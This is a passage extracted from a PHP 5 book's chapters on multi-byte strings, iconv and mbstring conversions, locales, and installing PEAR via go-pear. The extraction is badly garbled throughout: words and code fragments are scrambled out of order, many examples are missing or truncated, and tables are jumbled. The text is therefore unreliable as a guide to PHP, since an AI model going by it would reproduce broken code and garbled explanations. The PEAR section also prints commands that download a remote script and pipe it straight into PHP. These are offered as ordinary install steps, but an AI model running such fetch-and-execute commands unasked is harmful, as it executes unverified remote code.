    356 Gutmans_ch09 Page 328 Thursday, September 23, 2004 2:47 PM 328 Mainstream Extensions Chap. 9 OwnerString is usually the name of the owner of the camera. If it’s The available, we display it prefixed by the copyright sign. imagestring( $img, 5, 3, $size[1] – 21, implode('; ', $str), imagecolorallocate($img, 0, 0, 0) ); imagestring( $img, 5, 2, $size[1] – 20, implode('; ', $str), imagecolorallocate($img, 0, 255, 0) ); With , we draw the recorded data onto the image. imag- imagestring() estring() imagettftext() because it can only draw bitmap is not as nice as fonts, but it does the trick here. The first parameter is the image handle, and the second is the font number. The first two parameters are followed by the x and y coordinates, and then by the string to draw. The last parameter is the color. header('Content-Type: image/jpeg'); imagejpeg($img, '', 90); ?> The result of this script is the image shown in Figure 9.12 with the infor- mation added to it.

    357 Gutmans_ch09 Page 329 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 329 Exif data drawn on the image. Fig. 9.12 If you look closely, you see that the copyright sign (©) is replaced by ∪ S imag- something we didn’t expect ( ). SThis is because the default fonts for estring() are always in the ISO-8859-2 character set and the script was writ- ten in ISO-8859-1. This brings us to the next topic. YTE S TRINGS AND C HARACTER S 9.6 M ULTI -B ETS Not all languages use the same character set, not even in the western world. ∪ S For example, the is only part of ISO-8859-2, not of ISO-8859-1. Because these character sets only have 8 bits to use, that only makes 256 different com- binations. 8 bits is a problem for languages such as Chinese that have thou- sands of letters but 8 bits only support 256 characters. That’s why the Chinese (and also other Asian scripts) have to use another encoding for their charac- ters, such as BIG5 or GB2312. The Japanse use other encodings for their char- acters: EUC-JP, JIS, SJIS, and so on. All those different character sets are a problem to work with because some map the same character number to a dif- ferent character (such as © and which caused our problem at the end of the ≥ preceding section). That’s one of the reasons the Unicode project was started.

    358 Gutmans_ch09 Page 330 Thursday, September 23, 2004 2:47 PM 330 Mainstream Extensions Chap. 9 solves the problem by assigning a number to every unique character, Unicode just like the ISO 10646 standard. This standard reserves 31 bits for charac- ters, which should be more than enough room for every script out there (including “fictional” scripts like Tolkien’s Tengwar and the Egyptian hiero- glyphs). The characters that fit in the range 0-127 are the same as the good old ASCII standard, and the range 0-255 is the same as iso-8859-1 (Latin 1). All “normal” scripts characters are encoded in the range 0-65533—a subset called (BMP). Although Unicode only assigns num- the Basic Multilingual Plane bers to characters, it is usually not used to store text. The simplest ways of encoding are UCS-2 and UCS-4, which store characters as 2- or 4-byte sequences. UCS-2 and UCS-4 are not really useful because there is a possibil- ity of NULL bytes in the text or because the text would use too much space, even when the characters are only in the ASCII range. UTF-8, which solves these problems, is used more often. Characters in an UTF-8 encoded string 31 characters from UCS. This can be 1 to 6 bytes long and can represent all 2 section of the chapter deals mainly with UTF-8 and conversions to other encodings (such as iso-8859-1). Tip: For more information on Unicode, see the excellent FAQ at http:// www.cl.cam.ac.uk/~mgk25/unicode.html. 9.6.1 Character Set Conversions PHP 5 has support for character encoding and multi-byte issues in two exten- and sions: . The main difference between the two is that iconv iconv mbstring makes use of an external library (or the C library functions, if available), while mbstring extension has the library bundled with PHP. Although iconv the (at least in recent Linux distributions) supports much more encodings, mbstring might be the better choice for a script that has to be more portable. In addition to character encoding conversions, the mbstring extension includes a multi- extension is enabled with the -- mbstring byte regular expression library. The enable-mbstring option. The additional regular expression support is enabled by default when mbstring is enabled, but it can be turned of with --disable- . The iconv mbregex --with-iconv switch. In Fig- extension is enabled with the ures 9.13 and 9.14, you find the corresponding sections in for phpinfo() and iconv . The examples cover both extensions, whenever possible, mbstring and the character set used in the example scripts and output is in ISO-8859- 15, unless otherwise noted. Note: Some of these examples require OS support for the used character set. If something is not supported, you might see a different output for the example scripts.

    359 Gutmans_ch09 Page 331 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 331 mbstring phpinfo() Fig. 9.13 output. iconv phpinfo() output. Fig. 9.14 In the first example, we convert ISO-8859-15 (Latin 9) text to UTF-8: When the script runs, the output looks like this: ISO-8859-15: Kan De være så vennlig å hjelpe meg? UTF-8: Kan De và re sÃ¥ vennlig Ã¥ hjelpe meg? UTF-8: Kan De và re sÃ¥ vennlig Ã¥ hjelpe meg?

    360 Gutmans_ch09 Page 332 Thursday, September 23, 2004 2:47 PM 332 Mainstream Extensions Chap. 9 Sometimes, it’s not possible to convert text from one encoding to another, as shown in the following example: Denna text är på svenska We try to convert the text . from ISO-8859-1 to mb_convert_encoding() ISO-8859-2, but the “å” does not exist in ISO-8859-2. handles replaces the offending character (by default) with a “?”, whereas iconv() // just aborts the conversion at that point. However, you can add the TRANSLIT iconv() to replace the modifier to the to encoding parameter to tell offending character by a “?”. The //TRANSLIT also tries to convert to a represen- tation of a character, such as converting “©” to “(C)”, while converting from function ISO-8859-1 to ISO-8859-2. You can use the mb_substitute_character() extension to do something different with an offending char- mbstring to tell the acter, as shown here:

    361 Gutmans_ch09 Page 333 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 333 outputs ISO-8859-1: Ce texte est en français. ISO-8859-4: Ce texte est en fran?ais. ISO-8859-4: Ce texte est en franais. ISO-8859-4: Ce texte est en franU+E7ais. Tip: The web site http://www.eki.ee/letter/ is a useful tool that shows you what happens during character conversions. It provides lists of special charac- ters needed to write a certain language, including a list of encodings that sup- port this set. which might be mbstring() also features a non-encoding encoding html useful in some cases: outputs ISO-8859-1: Esto texto es Español. html: Esto texto es Español. The third parameter to the mb_convert_encoding() function is optional and defaults to the “internal encoding” that you can set with the function mb_internal_encoding() . If there is a parameter, the function returns either , if the encoding is supported, or TRUE and a warning if the encoding is not FALSE supported. If no parameters are passed, the function simply returns the cur- rent setting:

    362 Gutmans_ch09 Page 334 Thursday, September 23, 2004 2:47 PM 334 Mainstream Extensions Chap. 9 } echo mb_internal_encoding(). "\n"; ?> outputs ISO-8859-1 UTF-8 UTF-8 Tip: You can see a list with supported encodings by using the function mb_get_encodings() . The extension has similar possibilities. The function iconv can be used to set the internal encoding and the output iconv_set_encoding() encoding: outputs UTF-8 ISO-8859-1 The internal encoding setting has an effect on a couple of functions (which we cover in a bit) dealing with strings. The output encoding option doesn’t have any effect on those options, but can be used in combination with the ob_iconv_handler output buffering handler. With this enabled, PHP will automatically convert the text output to the browser from internal encoding to header if it wasn’t set in the Content-type output encoding. It adjusts the Content-type starts with text/ . script, and the current UTF-8 This example changes the output encoding to and activates the out- put handler. The result is an UTF-8 encoded output page (see Figure 9.15):

    363 Gutmans_ch09 Page 335 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 335 $text = << Fig. 9.15 UTF-8 encoded output. The other way around is a bit more useful. It makes more sense to store all of your data in UTF-8 (for example, in a database) and convert to the cor- rect encoding for the language you’re currently serving. 9.6.2 Extra Functions Dealing with Multi-Byte Character Sets mbstring and iconv extension are surro- A couple of extra functions in both the iconv_strlen (and gates for some of the string functions. For example, mb_strlen ) returns the number of “characters” (not bytes) in the strings passed to the function:

    364 Gutmans_ch09 Page 336 Thursday, September 23, 2004 2:47 PM 336 Mainstream Extensions Chap. 9 iconv_set_encoding('internal_encoding', $to); echo $string."\n"; echo "strlen: ". strlen($string). "\n"; $string = iconv($from, $to, $string); echo $string."\n"; echo "strlen: ". strlen($string). "\n"; echo "iconv_strlen: ". iconv_strlen($string). "\n"; ?> outputs Må jeg bytte tog? strlen: 17 MÃ¥ jeg bytte tog? strlen: 18 iconv_strlen: 17 The iconv_strlen() takes into account the multi-byte character Ã¥ (which is UTF-8 for “å”). Replacement functions for and strrpos() also exist. strpos() With these and the replacement for substr() , you can safely find a multi-byte string inside another multi-byte string. While trying to come up with an exam- ple for these functions that shows why it is important to use the multi-byte variants of those functions, we realized that it does not matter at all if UTF-8 is used as the encoding. The common problem that we are trying to illustrate was that a uni-byte character (like ") could also be a part of a multi-byte char- acter in the same string. However, for UTF-8 encoded strings this is not possi- ble, because all bytes of a multi-byte character have ordinal values of 128 or greater, while single-byte characters are always less than the ordinal value 128. is still useful for a multi-byte version of a “shorten” func- iconv_substr() tion, which in the example adds dieresis if a string is longer than a given set of characters (not bytes!).

    365 Gutmans_ch09 Page 337 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 337 echo "

    $text

    \n"; echo '

    '. substr($text, 0, 26). "...

    \n"; echo '

    '. iconv_substr($text, 0, 26). "...

    \n"; ?> Note: The character set in which this example is shown is UTF-8 and not ISO-8859-15. When this script is run, the output in a browser will be similar to Figure 9.16. Broken UTF-8 characters. Fig. 9.16 function doesn’t care about character As you can see, the normal substr() sets. It chops the “ç” into two bytes, generating an invalid UTF-8 character— which is rendered as the black square with the question mark in it. iconv_substr() does a much better job. It “knows” that the “ç” is a multi-byte character and counts it as one. For this to work, the internal encoding needs to be set to “UTF-8.” To demonstrate the use of , we use UCS-2BE (which actu- iconv_strpos() ally doesn’t encode anything, but simply stores the least significant bits of a UCS character), rather than UTF-8. The following script shows why you need to use iconv_strpos() and cannot simply use strpos() :
     
                  
                    

    366 Gutmans_ch09 Page 338 Thursday, September 23, 2004 2:47 PM 338 Mainstream Extensions Chap. 9 Because there is no way to create UCS-2BE encoded texts, we “create” a UCS-2BE encoded text from an ISO-8859-15 encoded string consisting of the . The Euro sign is especially interesting, Euro sign, a space, and the text 12.50 (in hexadecimal). A single space in any because the UCS-2 encoding is 0x20 0xac ISO-8859-* encoding is assigned the same code . In Figure 9.17, you see the 0x20 Original hexadecimal representation of the UCS-2 encoded string after . /* Initialize the output buffering mechanism */ iconv_set_encoding('output_encoding', $output); ob_start('ob_iconv_handler'); echo "Original: ", bin2hex($text), "\n"; We initialize the output buffer and set the output encoding to UTF-8. Then, we output the hexadecimal representation of our string, which will be converted to UTF-8 by the output buffer mechanism. /* The "wrong" way */ $amount = substr($text, strpos($text, $space) + 1); With , we locate the first space in the string. Then with substr() , strpos() $amount we obtain everything following this first space and assign it to the variable. However, this code doesn’t do what we expected. echo "After substr(): ", bin2hex($amount), "\n"; ob_flush(); We print the hexadecimal representation of the new string and flush the output buffer. The flush is needed so that all data in the buffer is send to the iconv output handler and we can reset the internal encoding to UCS-2BE. Without this flush, the output handler does not correctly encode the output (because it normally operates in blocks of 4096 bytes only). As you can see in Figure 9.17, following the “space” was matched in the wrong After substr(): location. The normal substr() function doesn’t know a thing about character $amount sets, and thus the variable does not contain valid UCS-2BE encoded text. iconv_set_encoding('internal_encoding', $internal); echo $amount; ob_flush(); iconv encoding to We need to set the internal , echo the (broken) UCS-2BE $amount string, and flush the output buffer so that we can change the internal encoding again.

    367 Gutmans_ch09 Page 339 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 339 /* Convert space character to UCS-2BE and match again */ $space = iconv('iso-8859-1', $internal, $space); $amount = iconv_substr($text, iconv_strpos($text, $space) + 1); Now, we convert our space character into UCS-2BE too, so that we can iconv_strpos() to find the first (real) occurrence in the string. use iconv_strpos() uses the internal encoding setting to determine if a character is found inside the string. Just like the normal strpos() , it returns the position where the needle was found, or 0 false if it wasn’t found. Therefore, because can be returned if the needle was found in the first position, you need to com- pare with === false to see whether the needle was actually found. In our example, it doesn’t matter if the needle is found at position 0 or not at all, because the iconv_substr() will copy the string starting from position 0 ( false 0 evaluates to ) anyway. iconv_set_encoding('internal_encoding', 'iso-8859-1'); echo "\nAfter iconv_substr(): ", bin2hex($amount), "\n"; ob_flush(); We temporarily set the internal encoding to ISO-8859-1 so that we can safely output the hexadecimal representation of the string. We flush the out- $amount variable, which is put buffer because we next want to output the encoded in UCS-2BE. iconv_set_encoding('internal_encoding', $internal); echo $amount; ?> With these final statements, the full output is displayed, as shown in Fig- 0x20 ure 9.14. Notice that the first match (space = ) is wrong. After the second 0x0020 was found and the string chopped up accordingly (see one, the correct Figure 9.17). Fig. 9.17 Problems without iconv_strops() .

    368 Gutmans_ch09 Page 340 Thursday, September 23, 2004 2:47 PM 340 Mainstream Extensions Chap. 9 9.6.3 Locales The mb_substr() and mb_strpos() . mbstring extension has similar functions: In addition, it has functions that can be used instead of the standard strtoupper() (respectively, mb_strtoupper() and PHP functions strtolower() mbstring functions take into account Unicode proper- mb_strtolower() and ). The ties so that they correctly change the string to upper- or lowercase characters functions for any supported character. But you don’t have to use the mbstring to do this for you because your operating system’s standard function library should support this by default. Information on how to upper- or lowercase a locale character is stored in a language’s locale. A is a collection of informa- tion defining the properties of language-dependent settings, such as the date/ time formats, number formats, and also which uppercase character correspon- dents to a lowercase character and vice versa. In PHP, you can use the setlo- function to set a new locale or query the current locale. There are a few cale() different “types” of locales; each type is meant to control a different type of lan- guage-dependent property. The different types are shown in Table 9.9. Locale Types Table 9.9 Description Example(s) Type Determines LC_COLLATE This setting has no effect on the standard PHP function to com- the meaning . Instead of using this function, you need strcmp() pare strings: of the \w and function to compare strings according to to use the strcoll() other classes the locale: for regular expressions, In Norwegian, the letter "æ" comes before the "å", but in the stan- dard "C" locale, the "å" comes after the "" because its ordinal value is higher (230 versus 229). The output is therefore -1 2

    369 Gutmans_ch09 Page 341 Thursday, September 23, 2004 2:47 PM 9.6 Multi-Byte Strings and Character Sets 341 Table 9.9 Locale Types Type Description Example(s) Determines LC_CTYPE dled. In the standard "C" locale, there is no "å" defined, so there is no uppercase value of it. In Norwegian, the uppercase value is "Å," so the output of this script is åTTE ÅTTE This locale type affects the strftime() function. We already Determines LC_TIME formatting of showed you the different modifiers for the strftime() function date and time when dealing with the date and time handling functions, so here is a short example to show how the locale affects the output of the values. %c modifier returns the preferred date/ strftime() function (the time format defined by the locale): This outputs Fri 09 Apr 2004 11:13:52 AM CEST vr 09 apr 2004 11:13:52 CEST fre 09-04-2004 11:13:52 CEST setlocale() Because only has effect on the current program, LC_MESSAGES Determines the language function in this example to set the putenv() we need to use the locale to a different one: in which LC_MESSAGES application’s might start from PHP. This outputs at: nothere: No such file or directory c cat: nothere: Ingen slik fil eller filkatalog

    370 Gutmans_ch09 Page 342 Thursday, September 23, 2004 2:47 PM 342 Mainstream Extensions Chap. 9 Table 9.9 Locale Types Type Description Example(s) Determines In PHP, these locale types affect the localeconv() function that LC_MONETARY returns information on how numbers and currency should be for- the format matted according to a locale’s properties: of monetary information, such as 0) { $sign_placement = $li['p_sign_posn']; $cs_placement = $li['p_cs_precedes']; $space = $li['p_sep_by_space'] ? ' ' : ''; $sign = $li['positive_sign']; } else { $sign_placement = $li['n_sign_posn']; $cs_placement = $li['n_cs_precedes']; $space = $li['n_sep_by_space'] ? ' ' : ''; $sign = $li['negative_sign']; } switch ($li['p_sign_posn']) { case 0: $format = ($sign_placement) ? '(%3$s%4$s%1$s)' : '(%1$s%4$s%3$s)'; break; case 1: $format = ($sign_placement) ? '%2$s %3$s%4$s%1$s' : '%2$s %1$s%4$s%3$s'; break; case 2: $format = ($sign_placement) ? '%3$s%4$s%1$s %2$s' : '%1$s%4$s%3$s %2$s'; break; case 3: $format = ($sign_placement) ? '%2$s %3$s%4$s%1$s' : '%1$s%4$s%2$s %3$s'; break; case 4: $format = ($sign_placement) ? '%3$s %2$s%4$s%1$s' : '%1$s%4$s%3$s %2$s'; break; } return sprintf($format. "\n", abs($amount), $li['currency_symbol'], $sign, $space); } setlocale(LC_ALL, 'nl_NL'); echo return_money(-1291.81); echo return_money(1291.81); ?> As you can see, we need a lot of code if we want to format numer- ical information correctly according to the locale; unfortunately, PHP does not have a built-in function for this.

    371 Gutmans_ch09 Page 343 Thursday, September 23, 2004 2:47 PM 9.7 Summary 343 Locale Types Table 9.9 Description Example(s) Type LC_NUMERIC Determines the format of numbers, such as the decimal point and thousands separator. UMMARY 9.7 S This chapter discusses miscellaneous features of PHP that are often needed for advanced PHP programming. This chapter provides information about working with streams—a feature of PHP—and about other features, such as regular expressions, date and time functions, building images, and converting between character sets—all features provided by PHP extensions. Beginning with PHP 4.3.0, you can interact with files, processes, pro- grams, or networks using streams. You can open, read, write, copy, rename, and otherwise manipulate local and remote files, including compressed files, and you can pipe information into and out of processes and programs using PHP functions that work with streams. Many stream functions are available, fopen() , which opens a file or URL for reading and/or writing data, and such as , which starts a process by executing a command and establishes a proc_open() pipe to the process that you can use to send and receive information from the process. Regular expressions enable you to create patterns that you can then com- pare to text. Regular expressions are powerful mechanisms for testing text for flow control and for validating user input. Perl regular expressions, provided by the PCRE extension that is enabled by default, consist of a string of special [0- characters and text representing general patterns that match text, such as 9] that matches any character between 0 and 9. PHP provides several exten- sions for using regular expressions, such as preg_match() that matches a string preg_replace to a pattern and returns the matching strings in an array, and that replaces a string that matches a pattern with another specified string. Other important functions provided by PHP allow special handling of dates and times, the creation of images, and the conversion of text from one character set to another. Date and time functions enable you to store any date, including now , and format the date in many ways, taking locale and Daylight Savings Time (DST) into account. The GD extension (not enabled by default) has many functions that enable you to build images, including color images containing text and bar charts. The and iconv extensions provide mbstring function that allow you to convert from one character set to another, such as converting a text string from ISO-8859-15 (Latin 9) to UTF-8. Locales are def- initions on how different languages and/or area represent text, date and time, and money. You can use the PHP function to switch between setlocale() locales and select different locales for different locale types.

    372 Gutmans_ch09 Page 344 Thursday, September 23, 2004 2:47 PM

    373 Gutmans_ch10 Page 345 Thursday, September 23, 2004 2:51 PM CHAPTER 10 Using PEAR 10.1 I NTRODUCTION This book mentioned PEAR a few times in the preceding chapters. PEAR , short for PHP Extension and Application Repository, is a package system for PHP. During version 4 of PHP, the number of users exploded, and so did the number of code snippets you could download from different web sites. Some of these sites offered code that you had to copy and paste into your editor, while others let you download archives with source files. This was useful to many people, but there was a need for a better way of sharing and re-using PHP code, similar to Perl’s CPAN. PEAR project The set out to solve this problem by providing an instal- lation and maintenance tool and code/release management standards. Today, PEAR provides ☞ The PEAR Installer (a package-management tool) ☞ Packages with PHP library code ☞ Packages with PHP extensions (PECL) ☞ PEAR coding standards, including a versioning standard A spin-off from the PEAR project is , the PHP Extension Commu- PECL nity Library. PECL used to be a subset of PEAR, but today, it is managed separately. This means that PECL has its own web site, mailing lists, admini- strative routines, and so on. However, PEAR and PECL share tools and infrastructure: Both use the PEAR Installer, both use the same package format, and both use the same ver- sioning standard. The coding standard is different however: PECL follows the PHP coding standard (for C code), while PEAR has its own. In this chapter, you are first introduced to PEAR through its terminology and concepts. The rest of this chapter covers using the PEAR Installer to install and manage packages on your site. 345

    374 Gutmans_ch10 Page 346 Thursday, September 23, 2004 2:51 PM 346 Using PEAR Chap. 10 After you finish reading this chapter, you will have learned ☞ Make sense of PEAR’s package concept and how PEAR packages com- pare to other package formats Obtain the command-line PEAR Installer in UNIX/Linux, Windows, and ☞ Darwin Install, upgrade, and uninstall packages ☞ Configure the PEAR Installer ☞ Obtain and use the desktop (Gtk) PEAR Installer ☞ Obtain and use the PEAR Web Installer ☞ ☞ Interpret PEAR version numbers ONCEPTS 10.2 PEAR C This section explains some PEAR concepts, namely packages, releases, and the versioning scheme. 10.2.1 Packages When you want to install something from PEAR, you download and install a package . (You learn more about releases later on.) particular release of a Each package has some information associated with it: ☞ HTML_QuickForm ) Package name (for example, Summary, description, and home page URL ☞ ☞ One or more maintainers License information ☞ ☞ Any number of releases PEAR packages are not unlike other package formats, such as Linux’s RPM, Debian packages, or the System V UNIX PKG format. One of the major differences with most of these is that PEAR packages are designed to be platform-independent, and not just within one family of operating systems, such as System V or Linux. Most PEAR packages are platform-independent; you can install them on any platform PHP supports, including all modern UNIX-like platforms, Microsoft Windows, and Apple’s MacOS X. 10.2.2 Releases As with PHP itself, the code that you actually install is packaged in a tar.gz or zip file along with installation instructions. PEAR packages are also released

    375 Gutmans_ch10 Page 347 Thursday, September 23, 2004 2:51 PM 347 10.2 PEAR Concepts through tar.gz (or tgz) files, and contain install instructions that are read by the PEAR Installer. In addition to this package-specific information, each release contains A version number ☞ ☞ A list of files and installation instructions for each ☞ A release state (stable, beta, alpha, devel, or snapshot) When you install a PEAR package, you receive the latest stable release by default, for example: $ pear install XML_Parser downloading XML_Parser-1.1.0.tgz ... Starting to download XML_Parser-1.1.0.tgz (7,273 bytes) ...done: 7,273 bytes install ok: XML_Parser 1.1.0 XML_Parser , you obtain the latest By running the command pear install stable release of the XML_Parser package, with the version number 1.1. You learn about these details later in this chapter. There are several reasons why PEAR did not use an existing format such as RPM as its package format. The most obvious reason is that PHP is very portable, so the package format would have to be supported on every platform PHP runs on. That would have meant either porting and maintaining ports of RPM (for example) to Windows and Darwin, or implementing RPM in PHP. Both options were considered too much work, so the choice was to implement the installation tools in PHP to be able to use the tools on various platforms easily. PEAR addresses the issues of integrating with RPM and other packaging systems by allowing PEAR packages to be wrapped inside operating system packages. 10.2.3 Version Numbers PEAR defines some standards for packages, a coding standard that you will learn about in Chapter 12, “Building PEAR Components,” and a versioning tells you how to interpret a version standard. The versioning standard number and, more importantly, how to compare two version numbers. PEAR’s version number standard is pretty much what you are used to from open-source packages, but it has been put in writing and implemented version compare() through PHP’s function. _ A version number can be everything from 10.2.3.1 Version Number Format a simple “1” to something awful, like “8.1.1.2.9b2.” However, PEAR cares about at most three numbers, plus an extra part at the end reserved for special cases, like “b1,” “RC2,” and so on. The syntax is like this: Major [ . minor [ . patch ]] [ dev | a | b | RC | pl [ N ]]

    376 Gutmans_ch10 Page 348 Thursday, September 23, 2004 2:51 PM Using PEAR Chap. 10 348 All these forms of version numbers are valid (see Table 10.1). Table 10.1 Example Version Numbers Version String Release State‘ Patch Level Minor Version Major Version 11——— 1b1 1 — — b1 — 0 — 1.0 1 1.0a1 1 0 — a1 2 1.2.1 1 — 1 1 dev 2 1 1.2.1dev dev 0 0 2 2.0.0-dev 1.2.1RC1 1 RC1 1 2 Most PEAR packages use the two- or three-number variation, sometimes adding a “release state” part, such as “b1,” during release cycles. Here’s an overview of the meaning of the release state component (see Table 10.2). Example Release States Table 10.2 Meaning Extra Dev In development; used for experimental releases. A Alpha release; anything may still change, may have many bugs, and the API not final. B Beta release; API is more or less stable, but may have some bugs. RC Release candidate; if testing reveals no problems, an RC is re-released as the final release. Patch level; (not very often) used when doing an “oops” release with last- Pl minute fixes. 10.2.3.2 Comparing Version Numbers PEAR sometimes compares two ver- sion numbers to determine which signifies a “newer” release. For example, when you run the pear list-upgrades command, the version numbers of your installed packages are compared to the newest version numbers in the pack- age repository on pear.php.net. This comparison works by comparing the major version first. If the major version of A is bigger than the major version of B, A is newer than B, and vice versa. If the major version is the same, the minor version is compared the same way. But as specified in the previous syntax, the minor version is optional so if only B has a minor version, B is considered newer than A. If the minor versions of A and B are the same, the patch level is compared in the same way. If the patch level of A and B are equal, too, the release state part determines the result. The comparison of the “extra” part is a little bit more involved because if A is missing a release state, that does not automatically make B newer. Release states starting with “dev,” “a,” “b,” and “RC” are considered older than “no extra part,” while “pl” (patch level) is considered newer.

    377 Gutmans_ch10 Page 349 Thursday, September 23, 2004 2:51 PM 10.3 Obtaining PEAR 349 Some example comparisons include those shown in Table 10.3. Table 10.3 Example Version Comparisons Version B Newest? Reason? Version A 1.1 B B has a greater minor version. 1.0 A 2.0 1.1 A has a greater major version. A has a patch level; B does not. A 2.0 2.0.1 2.0 B A “beta” release state is “older” than no 2.0b1 release state. A 2.0b1 2.0RC1 “Release candidate” is newer than “beta” for the same major.minor version. This one is subtle, adding a level makes a 1.0.0 B 1.0 version newer. Major Versus Minor Version Versus Patch Level So, what does it mean when the newest release of a package has a different major version than the one you have installed? Well, this is the theory: It should always be safe to upgrade to a newer patch level within the same major.minor version. If you use 1.0.1, upgrading to 1.0.2 is safe. There will only be bug fixes and very minor feature changes between patch levels. The API is completely backward compatible. It may or may not be safe to upgrade to a newer minor version within the same major version. A minor version increase is used to signify from small to big feature additions, and may introduce API changes. You should always read the release notes and change log for the releases between the one you have and the one you are upgrading to, to become aware of potential problems. If the major version of a package changes, it no longer attempts to be backward compatible. The package may have been re-implemented around a different paradigm or simply removed obsolete features. When the major version of a package changes, the Major Version Changes package name is changed and, as a result, the class names inside the package changes, too. This is to support having multiple major versions of the same package installed in the same file layout. For example, when version 2.0 of the package is released, the Money_Fast package name for that major version changes to either Money_Fast2 , , or . Money_Fast_v2 Money_Fastv2 10.3 O PEAR BTAINING In this section, you learn how to install PEAR on your platform from a PHP distribution or through the go-pear.org web site.

    378 Gutmans_ch10 Page 350 Thursday, September 23, 2004 2:51 PM 350 Using PEAR Chap. 10 10.3.1 Installing with UNIX / Linux PHP Distribution This section describes PEAR installation and basic usage that is specific for UNIX or UNIX-like platforms, such as Linux and Darwin. The installation of the PEAR Installer itself is somewhat OS-dependent, and because most of what you need to know about installation is OS-specific, you find that here. Using the installer is more similar on different platforms, so that is described in the next section, with the occasional note about OS idiosyncrasies. As of PHP 4.3.0, PEAR with all its basic prerequisites is installed by default when you install PHP. If you build PHP from source, these configure options cause problems for PEAR: . ☞ make install --disable-pear will neither install the PEAR installer or any packages. . The PEAR Installer depends on a standalone version of --disable-cli ☞ PHP installed. . PEAR requires the XML extension for parsing package --without-xml ☞ information files. This section shows how to install PEAR on a Windows 10.3.1.1 Windows PHP installation. Start by just installing a binary distribution of PHP from http://www.php.net/downloads.php (see Figure 10.1). If you go with the defaults, your PHP install will end up in C:\PHP, which is what you will see in the forthcoming examples. Fig. 10.1 PHP Welcome screen.

    379 Gutmans_ch10 Page 351 Thursday, September 23, 2004 2:51 PM 351 10.3 Obtaining PEAR 10.3.2 Installing with PHP Windows Installer When you have PHP installed, you need to make sure that your include_path PHP setting is sensible. Some versions of the Windows PHP Installer use in the default include path, but this directory ( ) is differ- c:\php4\pear c:\php4 ent from the one created by the PHP Windows Installer. So, edit your php.ini file (in c:\winnt or c:\windows, depending on your Windows version) and (see Figure 10.2). c:\php\pear change this directory to Example php.ini modifications Fig. 10.2 Now, you are ready to use go-pear. 10.3.3 go-pear.org go-pear.org is a web site with a single PHP script that you can download and run to install the latest stable version of the PEAR Installer and the PHP Foundation Classes (PFC). go-pear is cross-platform and can be run from the command line and from your web server. PHP distributions bundle a particular release of the PEAR Installer; on the other hand, go-pear gives you the newest stable PEAR releases. However, go-pear does know your directory layout, but really contorts itself to figure it out, and will try adapting your PEAR Installation to that. In this section, you learn how to use go-pear from the command line and web server, and on UNIX and Windows.

    380 Gutmans_ch10 Page 352 Thursday, September 23, 2004 2:51 PM 352 Using PEAR Chap. 10 10.3.3.1 Prerequisites Because go-pear is written in PHP, you need a CGI or CLI version of PHP to execute it outside the web server. By default, the CLI version is installed along with your web server PHP module. Try running php to see if it is available to you: –v PHP 5.0.0 (cli), Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0, Copyright (c) 1998-2004 Zend Technologies php By default, the command is installed in the /usr/local/bin directory on UNIX, or c:\php on Windows. In Windows, the CLI version of PHP may also be php-cli php-cli for every example that ; in that case, you need to type called php . says just 10.3.3.2 Going PEAR If your PHP install did not include PEAR, you can use go-pear as a universal PEAR bootstrapper. All you need is a CLI or CGI ver- sion of PHP installed somewhere. You can download the go-pear script and execute it, or run it all in one command, like this: $ lynx –source http://go-pear.org | php This command simply takes the contents of http://go-pear.org and sends it to PHP for execution. If you do not have lynx available on your system, try an alternative way go-pear of executing directly: wget Using GNUS : $ wget –O- http://go-pear.org | php fetch on FreeBSD: Using $ fetch –o – http://go-pear.org | php Using Perl LWP’s GET utility: $ GET http://go-pear.org | php On Windows, there is no “fetch this URL” tool, but you may be able to use PHP’s URL streams (make sure that is not disabled in your url_includes php.ini file): C:\> php-cli –r "include('http://go-pear.org');" If none of this works, open http://go-pear.org in your browser, save the contents as and simply run it from there: go-pear.php C:\> php go-pear.php The output will look like this: Welcome to go-pear! Go-pear will install the 'pear' command and all the files needed by ➥ it. This command is your tool for PEAR installation and maintenance. Go-pear also lets you download and install the PEAR packages bundled ➥ with PHP: DB, Net_Socket, Net_SMTP, Mail, XML_Parser, PHPUnit. If you wish to abort, press Control-C now, or press Enter to continue:

    381 Gutmans_ch10 Page 353 Thursday, September 23, 2004 2:51 PM 10.3 Obtaining PEAR 353 This greeting tells you what you are about to start. Press Enter for the first real question: HTTP proxy (http://user:password@proxy.myhost.com:port), or Enter for none: ➥ environment variable and presents the value go-pear http_proxy checks your is defined. If you want to use an HTTP of that as the default value if http_proxy proxy when downloading packages, enter the address of it here, or just press Enter for “no proxy.” Now, on to the interesting part: Below is a suggested file layout for your new PEAR installation. To change individual locations, type the number in front of the ➥ directory. Type 'all' to change all of then, or simply press Enter to ➥ accept these locations. ➥ 1. Installation prefix :/usr/local 2. Binaries directory : $prefix/bin 3. PHP code directory : $prefix/share/pear 4. Documentation base directory : $php_dir/docs : $php_dir/data 5. Data base directory 6. Tests base directory : $php_dir/tests 1-6, 'all' or Enter to continue: prefix , bin_dir , php_dir , Each setting is internally assigned to a variable ( doc_dir and test_dir , respectively). You may refer to the value of other , data_dir settings by referencing these variables, as shown previously. Let’s take a look at each setting: ☞ Installation prefix. The root directory of your PEAR installation. It has no $prefix other effect than serving as a root for the next five settings, using . ☞ Where programs and PHP scripts from PEAR pack- Binaries directory. pear executable ends up here. Remember to add this ages are installed. The . directory to your PATH PHP code directory. Where PHP code is installed. This directory must be ☞ when using the packages you install. in your include_path . The base directory for documentation. Documentation base directory ☞ By default, it is $php_dir/doc , and the documentation files for each package $doc_dir/ Package / file . are installed as ☞ Database directory. Data Where the PEAR Installer stores data files. are just a catch-all category for anything that does not fit as PHP code, files documentation, and so on. As with the documentation base directory, the package name is added to the path, so the data file convert.xsl in MyPackage $data_dir/MyPackage/convert.xsl . would be installed as ☞ Tests base directory. Where regression test scripts for the package are installed. The package name is also added to the directory. When you are satisfied with the directory layout, press Enter to proceed: The following PEAR packages are bundled with PHP: DB, Net_Socket, Net_SMTP, ➥ Mail, XML_Parser, PHPUnit2. Would you like to install these as well? [Y/n] :

